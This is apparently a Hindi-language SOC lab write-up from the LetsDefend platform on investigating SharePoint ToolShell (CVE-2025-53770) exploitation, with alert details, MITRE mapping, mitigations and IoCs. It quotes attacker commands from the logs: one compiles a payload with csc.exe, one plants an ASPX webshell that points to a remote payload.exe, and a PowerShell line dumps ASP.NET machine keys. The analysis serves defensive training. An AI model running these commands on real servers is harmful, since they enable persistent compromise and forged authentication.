
विश्लेषण कौशल और रिपोर्टिंग को प्रशिक्षित करने के लिए एक गतिविधि
यह Let's Defend प्लेटफ़ॉर्म पर किए गए एक जाँच-पड़ताल पर आधारित है, जो हाल ही में सामने आए SharePoint CVE पर केंद्रित है। आइए एक नज़र डालते हैं।
SOC342 नियम ने संवेदनशील ToolPane.aspx पृष्ठ को लक्षित करने वाले एक अनप्रमाणित (unauthenticated) POST अनुरोध का पता लगाया, जिसमें निम्नलिखित विशेषताएँ शामिल हैं:
एक बड़ा पेलोड (Content-Length: 7699)
एक संदिग्ध referer (SignOut.aspx) जो संभवतः उत्पत्ति को छिपाने के लिए उपयोग किया गया था
ToolShell भेद्यता के शोषण के अनुरूप व्यवहार
एक बाहरी उपयोगकर्ता (IP: 107.191.58.76) ने एक आंतरिक SharePoint सर्वर (172.16.20.17) को एक क्राफ्टेड अनुरोध भेजा।
अपने एंडपॉइंट के लॉग का विश्लेषण करें
एक w3wp.exe प्रक्रिया द्वारा एन्कोडेड PowerShell कमांड निष्पादित किया जाना संभावित शोषण या पोस्ट-एक्सप्लॉइटेशन गतिविधि (जैसे, छिपे हुए पेलोड का निष्पादन) का संकेत दे सकता है।
SharePoint वातावरण में, यह सत्यापित करना महत्वपूर्ण है कि यह व्यवहार अपेक्षित है या दुरुपयोग का प्रतिनिधित्व करता है।
कमांड को base64 का उपयोग करके अस्पष्ट (obfuscated) किया गया है
यह पेलोड हमलावर को उस मशीन से महत्वपूर्ण ASP.NET कॉन्फ़िगरेशन कुंजियाँ निकालने और प्रिंट करने की अनुमति देता है जिस पर यह चलता है।
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs
"C:\Windows\System32\cmd.exe" /c echo <form runat="server"> <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"><param name="Command" value="Redirect"> <param name="Button" value="Test"> <param name="Url" value="http://107.191.58.76/payload.exe\"> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx
सर्वर पर C# स्रोत कोड से एक निष्पादन योग्य (executable) संकलित करता है।
SharePoint पथ में एक वेब बैकडोर (दुर्भावनापूर्ण ASPX फ़ाइल) बनाता है, जिसे देखने पर, एक बाहरी पेलोड को निष्पादित या डाउनलोड करने की अनुमति मिलती है।
cmd.exe /c echo > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx
यह कमांड SharePoint LAYOUTS फ़ोल्डर में spinstall0.aspx नामक एक फ़ाइल बनाता है और उसमें सामग्री लिखता है (यहाँ एक वेबशेल के कोड का प्रतिनिधित्व करने वाला प्लेसहोल्डर है)।
यह spinstall0.apx का हैश है 92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514
आइए VirusTotal पर एक नज़र डालते हैं।
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"
यह कमांड हमलावर को MachineKeySection के एप्लिकेशन कॉन्फ़िगरेशन तक पहुँचने की अनुमति देता है, जो validation key और decryption key जैसी संवेदनशील क्रिप्टोग्राफ़िक कुंजियों को उजागर कर सकता है।
ये कुंजियाँ ASP.NET सुरक्षा के लिए महत्वपूर्ण हैं, जो प्रमाणीकरण कुकीज़ और ViewState जैसी चीज़ों की सुरक्षा करती हैं।
इन कुंजियों को उजागर करने या पुनर्प्राप्त करने से हमलावर प्रमाणीकरण टोकन गढ़ सकते हैं, संरक्षित डेटा को डिक्रिप्ट कर सकते हैं, या वेब एप्लिकेशन के विरुद्ध अन्य हमले कर सकते हैं।
MITRE ATT&CK
विश्लेषक नोट:
अलर्ट एक SharePoint सर्वर पर देखी गई असामान्य PowerShell गतिविधि के कारण उत्पन्न हुआ था, जिसे बाद में CVE-2025-53770 को लक्षित करने वाले शोषण प्रयास के रूप में निर्धारित किया गया। हमलावर ने शुरू में C# कंपाइलर (csc.exe) का उपयोग करके एक कस्टम C# निष्पादन योग्य (payload.exe) डाला और संकलित किया, फिर वेब-सुलभ SharePoint निर्देशिका के भीतर एक दुर्भावनापूर्ण ASPX वेबशेल (spinstall0.aspx) बनाया। इसके बाद, .NET रिफ्लेक्शन के माध्यम से सर्वर के कॉन्फ़िगरेशन से संवेदनशील क्रिप्टोग्राफ़िक मशीन कुंजियों को पुनर्प्राप्त करने के लिए एक PowerShell कमांड चलाया गया। क्रियाओं का यह क्रम एक बहु-चरणीय हमले का सुझाव देता है जिसे स्थायी नियंत्रण बनाए रखने और संभवतः प्रमाणीकरण टोकन गढ़ने के लिए डिज़ाइन किया गया है। वेबशेल को VirusTotal डिटेक्शन अनुपात 39/62 के साथ दुर्भावनापूर्ण के रूप में सत्यापित किया गया था। घटना की पुष्टि एक true positive के रूप में की गई है, और आगे की रोकथाम और सुधार उपायों की सलाह दी जाती है।
CVE-2025-53770 विवरण
ऑन-प्रिमाइसेस Microsoft SharePoint Server में अविश्वसनीय डेटा का डिसीरियलाइज़ेशन (Deserialization) एक अनधिकृत हमलावर को नेटवर्क पर कोड निष्पादित करने की अनुमति देता है। Microsoft को ज्ञात है कि CVE-2025-53770 के लिए एक शोषण जंगल में मौजूद है। Microsoft इस भेद्यता को दूर करने के लिए एक व्यापक अपडेट तैयार कर रहा है और उसका पूरी तरह से परीक्षण कर रहा है। इस बीच, कृपया सुनिश्चित करें कि इस CVE दस्तावेज़ में दिया गया शमन (mitigation) लागू है ताकि आप शोषण से सुरक्षित रहें।
Microsoft द्वारा सुझाया गया शमन: संभावित हमलों को कम करने के लिए ग्राहकों को चाहिए:
ऑन-प्रिमाइसेस SharePoint Server के समर्थित संस्करणों का उपयोग करें
ऊपर दिए गए नवीनतम सुरक्षा अपडेट लागू करें।
Microsoft Defender for Endpoint सुरक्षा, या समकक्ष खतरा समाधान तैनात करें
सुनिश्चित करें कि Antimalware Scan Interface (AMSI) चालू है और उचित रूप से कॉन्फ़िगर किया गया है, साथ ही Defender Antivirus जैसा उपयुक्त एंटीवायरस समाधान भी हो
SharePoint Server ASP.NET मशीन कुंजियों को रोटेट करें
IoC
Spinstall0.aspx खतरे के अभिनेताओं द्वारा उपयोग किया जाने वाला वेबशेल
अभिनेताओं ने फ़ाइल नाम को विभिन्न तरीकों से भी संशोधित किया है – जैसे spinstall.aspx, spinstall1.aspx, spinstall2.aspx
यह रिपोर्ट Let's Defend प्लेटफ़ॉर्म पर की गई एक गतिविधि पर आधारित है। प्रस्तुत सभी निष्कर्ष और सामग्री केवल शैक्षिक उद्देश्यों के लिए हैं। सभी अधिकार और स्वामित्व Let's Defend के पास हैं।